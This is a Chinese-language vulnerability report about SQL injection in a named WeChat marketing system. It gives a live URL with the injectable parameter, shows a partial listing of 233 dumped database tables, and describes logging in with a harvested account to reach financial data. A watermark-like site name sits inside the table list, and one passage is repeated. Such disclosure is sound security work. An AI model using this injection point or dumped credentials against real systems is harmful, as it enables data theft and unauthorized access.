某微信营销系统存在sql注入漏洞所有底细一览无余下载

sql注入漏洞，嗯，因为这个微信营销系统最重要的数据库已经可被拖库，所以自评个高rank

访问链接 http://www.wechatpen.com/api/app/website/list.aspx?wid=332389&acid=10379&menu_id=145128，正常



访问链接

http://www.wechatpen.com/api/app/website/detail.aspx?sn=&wid=332389&acid=%22&menu_id=145128&wxref=mp.weixin.qq.com，有惊喜



爆库：

 

Database: weixinbao

[233 tables]

+---------------------------------------+

| module                                |

| account                               |

| account_copy20131120                  |

| account_copy20140126                  |

| accountdetail                         |

| admin_nums                            |

| agent_level                           |

| www.myhack58.com                      |

| app_advs                              |

| app_attributes                        |

| app_attributevalues                   |

| app_brand                             |

| app_coupon                            |

| app_coupon_avis                       |

| app_coupon_result                     |

| app_coupon_sn                         |

| app_crm_datereport                    |

| app_crm_user                          |

| app_crm_usertarget                    |

| app_crm_weixin_account                |

| app_custom                            |

| app_eventclick_config                 |

| app_eventclick_menu_config            |

| app_fodder                            |

| app_food_choicefoodinfo               |

| app_food_choicefoodlist               |

| app_food_dinnertable                  |

| app_food_foodgroup                    |

| app_food_foodset                      |

。。。

有200多个呢，不一一贴了

拿其中一个账号登陆下看看。

 

同样也有财务，报表等数据，也可越权登陆功能。
拿其中一个账号登陆下看看。


 

同样也有财务，报表等数据，也可越权登陆功能。

怎样堵住漏洞你们应该比我更懂!